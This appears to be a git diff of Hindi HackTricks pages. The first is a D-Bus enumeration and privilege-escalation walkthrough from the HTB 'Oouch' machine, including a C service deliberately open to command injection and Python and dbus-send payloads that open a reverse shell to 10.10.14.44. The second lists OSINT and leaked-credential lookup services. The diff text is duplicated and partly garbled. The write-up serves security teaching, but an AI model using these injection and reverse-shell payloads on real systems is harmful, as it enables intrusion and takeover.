[विकिपीडिया से:](https://en.wikipedia.org/wiki/D-Bus) जब कोई प्रक्रिया एक बस के साथ एक कनेक्शन सेट करती है, तो बस कनेक्शन को एक विशेष बस नाम जो _अद्वितीय कनेक्शन नाम_ कहलाता है निर्धारित करता है। इस प्रकार के बस नाम अपरिवर्तनीय होते हैं—यह गारंटी है कि जब तक कनेक्शन मौजूद है तब तक वे बदलेंगे नहीं—और, और भी महत्वपूर्ण है, इन्हें बस के जीवनकाल के दौरान पुनः उपयोग नहीं किया जा सकता। इसका मतलब है कि उस बस के लिए कोई भी अन्य कनेक्शन कभी भी ऐसा अद्वितीय कनेक्शन नाम नहीं होगा, भले ही वही प्रक्रिया उस बस के साथ कनेक्शन बंद कर देती है और एक नया बनाती है। अद्वितीय कनेक्शन नाम आसानी से पहचाने जा सकते हैं क्योंकि वे—अन्यथा निषिद्ध—अक्षर के साथ शुरू होते हैं।
|
||||
|
||||
### सेवा ऑब्ज
|
||||
### सेवा ऑब्जेक्ट जानकारी
|
||||
|
||||
फिर, आप इंटरफेस के बारे में कुछ जानकारी प्राप्त कर सकते हैं:
|
||||
```bash
|
||||
busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface
|
||||
|
||||
|
@ -119,11 +134,9 @@ cap_mknod cap_lease cap_audit_write cap_audit_control
|
|||
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
|
||||
cap_wake_alarm cap_block_suspend cap_audit_read
|
||||
```
|
||||
|
||||
### सेवा ऑब्जेक्ट के इंटरफेस की सूची बनाएं
|
||||
### सेवा ऑब्जेक्ट के इंटरफेस सूची
|
||||
|
||||
आपको पर्याप्त अनुमतियाँ होनी चाहिए।
|
||||
|
||||
```bash
|
||||
busctl tree htb.oouch.Block #Get Interfaces of the service object
|
||||
|
||||
|
@ -131,11 +144,9 @@ busctl tree htb.oouch.Block #Get Interfaces of the service object
|
|||
└─/htb/oouch
|
||||
└─/htb/oouch/Block
|
||||
```
|
||||
|
||||
### सेवा ऑब्जेक्ट का इंट्रोस्पेक्ट इंटरफेस
|
||||
|
||||
ध्यान दें कि इस उदाहरण में `tree` पैरामीटर का उपयोग करके नवीनतम इंटरफेस का चयन किया गया था (_पिछले खंड देखें_):
|
||||
|
||||
```bash
|
||||
busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface
|
||||
|
||||
|
@ -153,27 +164,23 @@ org.freedesktop.DBus.Properties interface - - -
|
|||
.Set method ssv - -
|
||||
.PropertiesChanged signal sa{sv}as - -
|
||||
```
|
||||
|
||||
### मॉनिटर/कैप्चर इंटरफेस
|
||||
|
||||
पर्याप्त विशेषाधिकारों के साथ (केवल `send_destination` और `receive_sender` विशेषाधिकार ही काफी नहीं हैं) आप **एक डी-बस संचार को मॉनिटर** कर सकते हैं।
|
||||
पर्याप्त विशेषाधिकारों के साथ (केवल `send_destination` और `receive_sender` विशेषाधिकार पर्याप्त नहीं हैं) आप **एक डी-बस संचार को मॉनिटर** कर सकते हैं।
|
||||
|
||||
**संचार** को **मॉनिटर** करने के लिए आपको **रूट** होना होगा। अगर फिर भी रूट होने में समस्या हो तो [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) और [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) देखें।
|
||||
**संचार** को **मॉनिटर** करने के लिए आपको **रूट** होना चाहिए। अगर आप फिर भी रूट होने में समस्या आ रही है तो [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) और [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) देखें।
|
||||
|
||||
{% hint style="warning" %}
|
||||
अगर आपको पता है कि एक डी-बस कॉन्फ़िग फ़ाइल को कैसे कॉन्फ़िगर करें ताकि **गैर रूट उपयोगकर्ताओं को स्निफ़ करने** की अनुमति हो, तो कृपया **मुझसे संपर्क करें**!
|
||||
अगर आप जानते हैं कि एक डी-बस कॉन्फ़िग फ़ाइल को कैसे कॉन्फ़िगर करें ताकि **गैर रूट उपयोगकर्ताओं को स्निफ़ करने** की अनुमति हो, तो कृपया **मुझसे संपर्क करें**!
|
||||
{% endhint %}
|
||||
|
||||
मॉनिटर करने के विभिन्न तरीके:
|
||||
|
||||
```bash
|
||||
sudo busctl monitor htb.oouch.Block #Monitor only specified
|
||||
sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see
|
||||
sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see
|
||||
```
|
||||
|
||||
**निम्नलिखित उदाहरण में इंटरफेस `htb.oouch.Block` को मॉनिटर किया जाता है और संदेश "\_**lalalalal**\_**" गलत संचार के माध्यम से भेजा जाता है\*\*:
|
||||
|
||||
In the following example the interface `htb.oouch.Block` is monitored and **the message "**_**lalalalal**_**" is sent through miscommunication**:
|
||||
```bash
|
||||
busctl monitor htb.oouch.Block
|
||||
|
||||
|
@ -192,17 +199,13 @@ MESSAGE "s" {
|
|||
STRING "Carried out :D";
|
||||
};
|
||||
```
|
||||
|
||||
#### सभी शोर को फ़िल्टर करना <a href="#filtering_all_the_noise" id="filtering_all_the_noise"></a>
|
||||
|
||||
अगर बस पर बहुत सारी जानकारी है, तो इस तरह से एक मैच नियम पास करें:
|
||||
|
||||
अगर बस पर बहुत सारी जानकारी है, तो ऐसे ही एक मैच नियम पास करें:
|
||||
```bash
|
||||
dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'"
|
||||
```
|
||||
|
||||
Multiple नियम निर्दिष्ट किए जा सकते हैं। यदि संदेश में से किसी भी नियम से मेल खाता है, तो संदेश प्रिंट किया जाएगा। इस प्रकार:
|
||||
|
||||
एकाधिक नियम निर्दिष्ट किए जा सकते हैं। यदि संदेश में से किसी भी नियम से मेल खाता है, तो संदेश प्रिंट किया जाएगा। इस प्रकार:
|
||||
```bash
|
||||
dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"
|
||||
```
|
||||
|
@ -210,17 +213,15 @@ dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"
|
|||
```bash
|
||||
dbus-monitor "type=method_call" "type=method_return" "type=error"
|
||||
```
|
||||
|
||||
अधिक जानकारी के लिए [D-Bus दस्तावेज़ीकरण](http://dbus.freedesktop.org/doc/dbus-specification.html) देखें।
|
||||
|
||||
### अधिक
|
||||
|
||||
`busctl` के पास और भी विकल्प हैं, [**उन सभी को यहाँ ढूंढें**](https://www.freedesktop.org/software/systemd/man/busctl.html)।
|
||||
`busctl` के पास और भी विकल्प हैं, [**उन सभी को यहाँ खोजें**](https://www.freedesktop.org/software/systemd/man/busctl.html)।
|
||||
|
||||
## **भेद्य स्थिति**
|
||||
|
||||
उपयोगकर्ता **qtc एचटीबी से "oouch" में** एक **अप्रत्याशित डी-बस कॉन्फ़िग फ़ाइल** खोज सकते हैं जो _/etc/dbus-1/system.d/htb.oouch.Block.conf_ में स्थित है।
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="UTF-8"?> <!-- -*- XML -*- -->
|
||||
|
||||
|
@ -241,11 +242,9 @@ dbus-monitor "type=method_call" "type=method_return" "type=error"
|
|||
|
||||
</busconfig>
|
||||
```
|
||||
|
||||
नोट: पिछले कॉन्फ़िगरेशन से ध्यान दें कि **आपको इस D-BUS संचार के माध्यम से जानकारी भेजने और प्राप्त करने के लिए उपयोगकर्ता `root` या `www-data` होना आवश्यक** है।
|
||||
|
||||
उपयोगकर्ता **qtc** डॉकर कंटेनर **aeb4525789d8** के अंदर आपको फ़ाइल _/code/oouch/routes.py_ में कुछ dbus संबंधित कोड मिल सकता है। यह दिलचस्प कोड है:
|
||||
|
||||
```python
|
||||
if primitive_xss.search(form.textfield.data):
|
||||
bus = dbus.SystemBus()
|
||||
|
@ -257,16 +256,14 @@ response = block_iface.Block(client_ip)
|
|||
bus.close()
|
||||
return render_template('hacker.html', title='Hacker')
|
||||
```
|
||||
जैसा कि आप देख सकते हैं, यह **एक D-Bus इंटरफेस से कनेक्ट कर रहा है** और "ब्लॉक" फ़ंक्शन को "client\_ip" को भेज रहा है।
|
||||
|
||||
जैसा कि आप देख सकते हैं, यह **एक D-Bus इंटरफेस से कनेक्ट कर रहा है** और **"Block" फ़ंक्शन** को "client\_ip" को भेज रहा है।
|
||||
D-Bus कनेक्शन के दूसरी ओर कुछ C संकलित बाइनरी चल रहा है। यह कोड D-Bus कनेक्शन में **IP पते के लिए सुनवाई कर रहा है और `system` फ़ंक्शन के माध्यम से iptables को कॉल कर रहा है**।\
|
||||
**`system` कोमांड इंजेक्शन के लिए उद्देश्यपूर्ण रूप से वंशावली है**, इसलिए निम्नलिखित पेलोड एक रिवर्स शैल बनाएगा: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
|
||||
|
||||
D-Bus कनेक्शन के दूसरी ओर कुछ C संकलित बाइनरी चल रहा है। यह कोड D-Bus कनेक्शन में **IP पता सुन रहा है और `system` फ़ंक्शन के माध्यम से iptables को कॉल कर रहा है** दिए गए IP पते को ब्लॉक करने के लिए।\
|
||||
**`system` कोमांड इंजेक्शन के लिए उद्देश्यपूर्ण रूप से वंशावलोकनयोग्य है**, इसलिए निम्नलिखित पेलोड एक रिवर्स शैल बनाएगा: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
|
||||
|
||||
### इसका शीघ्रफलन करें
|
||||
### इसका शिकार बनें
|
||||
|
||||
इस पृष्ठ के अंत में आप **D-Bus एप्लिकेशन का पूरा C कोड** पा सकते हैं। इसके अंदर आप 91-97 लाइनों के बीच **कैसे `D-Bus ऑब्जेक्ट पथ`** और `इंटरफेस नाम` **रजिस्टर किए गए हैं** यह जानकारी D-Bus कनेक्शन में जानकारी भेजने के लिए आवश्यक होगी:
|
||||
|
||||
```c
|
||||
/* Install the object */
|
||||
r = sd_bus_add_object_vtable(bus,
|
||||
|
@ -276,17 +273,13 @@ r = sd_bus_add_object_vtable(bus,
|
|||
block_vtable,
|
||||
NULL);
|
||||
```
|
||||
|
||||
भी, पंक्ति 57 में आपको पाया जाता है कि **इस D-Bus संचार के लिए पंजीकृत केवल एक विधि** को `Block` कहा जाता है (_**इसलिए आगामी खंड में पेलोड को सेवा ऑब्जेक्ट `htb.oouch.Block`, इंटरफेस `/htb/oouch/Block` और विधि नाम `Block` पर भेजा जाएगा**_):
|
||||
|
||||
Also, in line 57 you can find that **केवल वह विधि पंजीकृत** है जिसके लिए इस D-Bus संचार के लिए बुलाया जाता है `Block`(_**इसलिए इसके अगले खंड में पेलोड सेवा ऑब्जेक्ट `htb.oouch.Block`, इंटरफेस `/htb/oouch/Block` और विधि नाम `Block` पर भेजे जाएंगे**_):
|
||||
```c
|
||||
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
|
||||
```
|
||||
|
||||
#### Python
|
||||
|
||||
निम्नलिखित पायथन कोड D-Bus कनेक्शन में `Block` विधि को `block_iface.Block(runme)` के माध्यम से भेजेगा (_ध्यान दें कि यह पिछले कोड खंड से निकाला गया था_):
|
||||
|
||||
निम्नलिखित पायथन कोड D-Bus कनेक्शन में `Block` विधि को `block_iface.Block(runme)` के माध्यम से पेलोड भेजेगा (_ध्यान दें कि यह पिछले कोड खंड से निकाला गया था_):
|
||||
```python
|
||||
import dbus
|
||||
bus = dbus.SystemBus()
|
||||
|
@ -296,20 +289,22 @@ runme = ";bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #"
|
|||
response = block_iface.Block(runme)
|
||||
bus.close()
|
||||
```
|
||||
|
||||
#### busctl और dbus-send
|
||||
|
||||
```bash
|
||||
dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #'
|
||||
```
|
||||
* `dbus-send` एक उपकरण है जो "संदेश बस" को भेजने के लिए उपयोग किया जाता है।
|
||||
* संदेश बस - एक सॉफ्टवेयर जो सिस्टम द्वारा एप्लिकेशन्स के बीच संचार को आसान बनाने के लिए उपयोग किया जाता है। यह संदेश कतार (संदेश क्रम में क्रमबद्ध होते हैं) से संबंधित है, लेकिन संदेश बस में संदेशों को एक सब्सक्रिप्शन मॉडल में भेजा जाता है और यह बहुत तेज होता है।
|
||||
* "-system" टैग का उपयोग इसे एक सिस्टम संदेश के रूप में उल्लेखित करने के लिए किया जाता है, न कि एक सत्र संदेश (डिफ़ॉल्ट रूप से)।
|
||||
* "--print-reply" टैग हमारे संदेश को उचित रूप में प्रिंट करने और मानव-पठनीय स्वरूप में किसी भी जवाब को प्राप्त करने के लिए उपयोग किया जाता है।
|
||||
* "--dest=Dbus-Interface-Block" Dbus इंटरफेस का पता।
|
||||
* "--string:" - हमें इंटरफेस को भेजने के लिए प्रकार का संदेश पसंद है। संदेश भेजने के कई प्रारूप हैं जैसे डबल, बाइट्स, बूलियन, इंट, ऑब्जपथ। इनमें से, "ऑब्जेक्ट पथ" उपयोगी होता है जब हम Dbus इंटरफेस को एक फ़ाइल के पथ को भेजना चाहते हैं। इस मामले में हम इंटरफेस को एक फ़ाइल के नाम में एक कमांड पास करने के लिए एक विशेष फ़ाइल (FIFO) का उपयोग कर सकते हैं। "string:;" - यह फिर से ऑब्जेक्ट पथ को बुलाने के लिए है जहां हम FIFO रिवर्स शैल फ़ाइल/कमांड की जगह रखते हैं।
|
||||
|
||||
* `dbus-send` एक उपकरण है जिसका उपयोग "संदेश बस" को संदेश भेजने के लिए किया जाता है।
|
||||
* संदेश बस - एक सॉफ्टवेयर जो सिस्टमों द्वारा एप्लिकेशन्स के बीच संचार को आसान बनाने के लिए उपयोग किया जाता है। यह संदेश कतार (संदेश क्रम में क्रमबद्ध होते हैं) से संबंधित है, लेकिन संदेश बस में संदेशों को एक सब्सक्रिप्शन मॉडल में भेजा जाता है और यह बहुत तेज होता है।
|
||||
* "-system" टैग का उपयोग करना इसे उल्लेखित करने के लिए किया जाता है कि यह एक सिस्टम संदेश है, डिफ़ॉल्ट रूप से एक सत्र संदेश नहीं।
|
||||
* "--print-reply" टैग का उपयोग हमारे संदेश को उचित रूप से प्रिंट करने और मानव-पठनीय प्रारूप में किसी भी जवाब को प्राप्त करने के लिए किया जाता है।
|
||||
* "--dest=Dbus-Interface-Block" - Dbus इंटरफेस का पता।
|
||||
* "--string:" - हमें इंटरफेस को भेजने के लिए एसंदेश का प्रकार। संदेश भेजने के कई प्रारूप हैं जैसे डबल, बाइट्स, बूलियन, इंटीजर, ऑब्जपथ। इनमें से, "ऑब्ज
|
||||
_ध्यान दें कि `htb.oouch.Block.Block` में पहला हिस्सा (`htb.oouch.Block`) सेवा ऑब्जेक्ट को संदर्भित करता है और आखिरी हिस्सा (`.Block`) विधि का नाम संदर्भित करता है।_
|
||||
|
||||
### सी कोड
|
||||
|
||||
{% code title="d-bus_server.c" %}
|
||||
```c
|
||||
//sudo apt install pkgconf
|
||||
//sudo apt install libsystemd-dev
|
||||
|
@ -450,21 +445,22 @@ sd_bus_unref(bus);
|
|||
return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
|
||||
}
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
## संदर्भ
|
||||
|
||||
* [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को** **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,148 +1,137 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs संग्रह**](https://opensea.io/collection/the-peass-family)
|
||||
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# [ProjectHoneypot](https://www.projecthoneypot.org/)
|
||||
|
||||
आप पूछ सकते हैं कि क्या कोई IP संदिग्ध/दुर्भावनापूर्ण गतिविधियों से संबंधित है। पूरी तरह से मुफ्त।
|
||||
आप पूछ सकते हैं कि क्या किसी IP संदिग्ध/दुष्ट गतिविधियों से संबंधित है। पूरी तरह से मुफ्त।
|
||||
|
||||
# [**BotScout**](http://botscout.com/api.htm)
|
||||
|
||||
जांचें कि क्या IP पता बॉट से संबंधित है जो खाते रजिस्टर करता है। यह उपयोगकर्ता नाम और ईमेल की भी जांच कर सकता है। प्रारंभ में मुफ्त।
|
||||
जांचें कि क्या IP पता संदिग्ध गतिविधियों से संबंधित है जो खाते रजिस्टर करते हैं। यह उपयोगकर्ता नाम और ईमेल भी जांच सकता है। प्रारंभिक रूप से मुफ्त।
|
||||
|
||||
# [Hunter](https://hunter.io/)
|
||||
|
||||
ईमेल खोजें और सत्यापित करें।
|
||||
कुछ मुफ्त API अनुरोध मुफ्त, अधिक के लिए आपको भुगतान करना होगा।
|
||||
कुछ मुफ्त API अनुरोध मुफ्त हैं, अधिक के लिए आपको भुगतान करना होगा।
|
||||
व्यावसायिक?
|
||||
|
||||
# [AlientVault](https://otx.alienvault.com/api)
|
||||
|
||||
IP और डोमेन से संबंधित दुर्भावनापूर्ण गतिविधियों का पता लगाएं। मुफ्त।
|
||||
IPs और डोमेन्स से जुड़ी दुष्ट गतिविधियों को खोजें। मुफ्त।
|
||||
|
||||
# [Clearbit](https://dashboard.clearbit.com/)
|
||||
|
||||
ईमेल से संबंधित व्यक्तिगत डेटा खोजें \(अन्य प्लेटफॉर्मों पर प्रोफाइल\), डोमेन \(कंपनी की मूल जानकारी, मेल और काम करने वाले लोग\) और कंपनियां \(मेल से कंपनी की जानकारी प्राप्त करें\)।
|
||||
सभी संभावनाओं तक पहुंचने के लिए आपको भुगतान करना होगा।
|
||||
ईमेल \(अन्य प्लेटफॉर्मों पर प्रोफाइल\), डोमेन \(मूल व्यापार सूचना, मेल और काम करने वाले लोग\) और कंपनियों \(मेल से कंपनी की जानकारी प्राप्त करें\) से संबंधित व्यक्तिगत डेटा खोजें।
|
||||
आपको सभी संभावनाओं तक पहुंचने के लिए भुगतान करना होगा।
|
||||
व्यावसायिक?
|
||||
|
||||
# [BuiltWith](https://builtwith.com/)
|
||||
|
||||
वेब द्वारा प्रयुक्त प्रौद्योगिकियां। महंगा...
|
||||
वेब्स द्वारा उपयोग की जाने वाली तकनीक। महंगा...
|
||||
व्यावसायिक?
|
||||
|
||||
# [Fraudguard](https://fraudguard.io/)
|
||||
|
||||
जांचें कि क्या कोई होस्ट \(डोमेन या IP\) संदिग्ध/दुर्भावनापूर्ण गतिविधियों से संबंधित है। कुछ मुफ्त API पहुंच है।
|
||||
जांचें कि क्या एक होस्ट \(डोमेन या IP\) संदिग्ध/दुष्ट गतिविधियों से संबंधित है। कुछ मुफ्त API पहुंच है।
|
||||
व्यावसायिक?
|
||||
|
||||
# [FortiGuard](https://fortiguard.com/)
|
||||
|
||||
जांचें कि क्या कोई होस्ट \(डोमेन या IP\) संदिग्ध/दुर्भावनापूर्ण गतिविधियों से संबंधित है। कुछ मुफ्त API पहुंच है।
|
||||
जांचें कि क्या एक होस्ट \(डोमेन या IP\) संदिग्ध/दुष्ट गतिविधियों से संबंधित है। कुछ मुफ्त API पहुंच है।
|
||||
|
||||
# [SpamCop](https://www.spamcop.net/)
|
||||
|
||||
यह दर्शाता है कि क्या होस्ट स्पैम गतिविधि से संबंधित है। कुछ मुफ्त API पहुंच है।
|
||||
सूचित करता है कि क्या होस्ट स्पैम गतिविधि से संबंधित है। कुछ मुफ्त API पहुंच है।
|
||||
|
||||
# [mywot](https://www.mywot.com/)
|
||||
|
||||
राय और अन्य मेट्रिक्स के आधार पर यह पता लगाएं कि क्या कोई डोमेन संदिग्ध/दुर्भावनापूर्ण जानकारी से संबंधित है।
|
||||
रायों और अन्य मैट्रिक्स के आधार पर देखें कि क्या एक डोमेन संदिग्ध/दुष्ट जानकारी से संबंधित है।
|
||||
|
||||
# [ipinfo](https://ipinfo.io/)
|
||||
|
||||
एक IP पते से मूलभूत जानकारी प्राप्त करें। आप प्रति माह 100K तक परीक्षण कर सकते हैं।
|
||||
एक IP पते से मूलिक जानकारी प्राप्त करें। आप 100K/महीने तक परीक्षण कर सकते हैं।
|
||||
|
||||
# [securitytrails](https://securitytrails.com/app/account)
|
||||
|
||||
यह मंच डोमेन और IP पतों के बारे में जानकारी देता है जैसे कि एक IP या डोमेन सर्वर के अंदर डोमेन, एक ईमेल द्वारा स्वामित्व वाले डोमेन \(संबंधित डोमेन खोजें\), डोमेन के IP इतिहास \(CloudFlare के पीछे के होस्ट का पता लगाएं\), एक नामसर्वर का उपयोग करने वाले सभी डोमेन....
|
||||
यह प्लेटफॉर्म डोमेन और IP पतों के बारे में जानकारी देता है जैसे कि एक IP के अंदर डोमेन, डोमेन सर्वर के अंदर डोमेन, एक ईमेल द्वारा स्वामित डोमेन \(संबंधित डोमेन खोजें\), डोमेनों का IP इतिहास \(क्लाउडफ्लेयर के पीछे होस्ट खोजें\), एक नेमसर्वर का उपयोग करने वाले सभी डोमेन....
|
||||
आपके पास कुछ मुफ्त पहुंच है।
|
||||
|
||||
# [fullcontact](https://www.fullcontact.com/)
|
||||
|
||||
ईमेल, डोमेन या कंपनी का नाम खोजने की अनुमति देता है और "व्यक्तिगत" संबंधित जानकारी प्राप्त करता है। यह ईमेल भी सत्यापित कर सकता है। कुछ मुफ्त पहुंच है।
|
||||
ईमेल, डोमेन या कंपनी के नाम से खोज करने और संबंधित "व्यक्तिगत" जानकारी प्राप्त करने की अनुमति देता है। यह ईमेल सत्यापित कर सकता है। कुछ मुफ्त पहुंच है।
|
||||
|
||||
# [RiskIQ](https://www.spiderfoot.net/documentation/)
|
||||
|
||||
डोमेन और IPs से संबंधित बहुत सारी जानकारी यहां तक कि मुफ्त/सामुदायिक संस्करण में भी।
|
||||
डोमेन्स और IPs से बहुत सारी जानकारी मुफ्त/समुदाय संस्करण में भी।
|
||||
|
||||
# [\_IntelligenceX](https://intelx.io/)
|
||||
|
||||
डोमेन, IPs और ईमेल खोजें और डंप से जानकारी प्राप्त करें। कुछ मुफ्त पहुंच है।
|
||||
खोजें डोमेन, IPs और ईमेल और डंप से जानकारी प्राप्त करें। कुछ मुफ्त पहुंच है।
|
||||
|
||||
# [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/)
|
||||
|
||||
IP द्वारा खोजें और संदेहास्पद गतिविधियों से संबंधित जानकारी एकत्र करें। कुछ मुफ्त पहुंच है।
|
||||
IP द्वारा खोजें और संदिग्ध गतिविधियों से संबंधित जानकारी एकत्र करें। कुछ मुफ्त पहुंच है।
|
||||
|
||||
# [Greynoise](https://viz.greynoise.io/)
|
||||
|
||||
IP या IP रेंज द्वारा खोजें और इंटरनेट स्कैन करने वाले IPs के बारे में जानकारी प्राप्त करें। 15 दिनों की मुफ्त पहुंच।
|
||||
IP या IP रेंज द्वारा खोजें और इंटरनेट स्कैन करने वाले IPs के बारे में जानकारी प्राप्त करें। 15 दिन मुफ्त पहुंच है।
|
||||
|
||||
# [Shodan](https://www.shodan.io/)
|
||||
|
||||
एक IP पते की स्कैन जानकारी प्राप्त करें। कुछ मुफ्त api पहुंच है।
|
||||
एक IP पते की स्कैन जानकारी प्राप्त करें। कुछ मुफ्त एपीआई पहुंच है।
|
||||
|
||||
# [Censys](https://censys.io/)
|
||||
|
||||
Shodan के समान बहुत ही समान
|
||||
शोडन के बहुत ही समान
|
||||
|
||||
# [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/)
|
||||
|
||||
कीवर्ड द्वारा खोज करके खुले S3 बकेट्स खोजें।
|
||||
खोजें खोले गए S3 बकेट्स जिन्हें शब्दों द्वारा खोजा जा सकता है।
|
||||
|
||||
# [Dehashed](https://www.dehashed.com/data)
|
||||
|
||||
ईमेल और यहां तक कि डोमेन की लीक हुई साख प्राप्त करें
|
||||
ईमेल और डोमेन के लीक हुए क्रेडेंशियल्स खोजें
|
||||
व्यावसायिक?
|
||||
|
||||
# [psbdmp](https://psbdmp.ws/)
|
||||
|
||||
पेस्टबिन्स खोजें जहां एक ईमेल दिखाई दिया। व्यावसायिक?
|
||||
खोजें पास्टबिन्स जहां एक ईमेल प्रकट हुआ।
|
||||
व्यावसायिक?
|
||||
|
||||
# [emailrep.io](https://emailrep.io/key)
|
||||
|
||||
एक मेल की प्रतिष्ठा प्राप्त करें। व्यावसायिक?
|
||||
एक मेल की प्रतिष्ठा प्राप्त करें।
|
||||
व्यावसायिक?
|
||||
|
||||
# [ghostproject](https://ghostproject.fr/)
|
||||
|
||||
लीक हुए ईमेल से पासवर्ड प्राप्त करें। व्यावसायिक?
|
||||
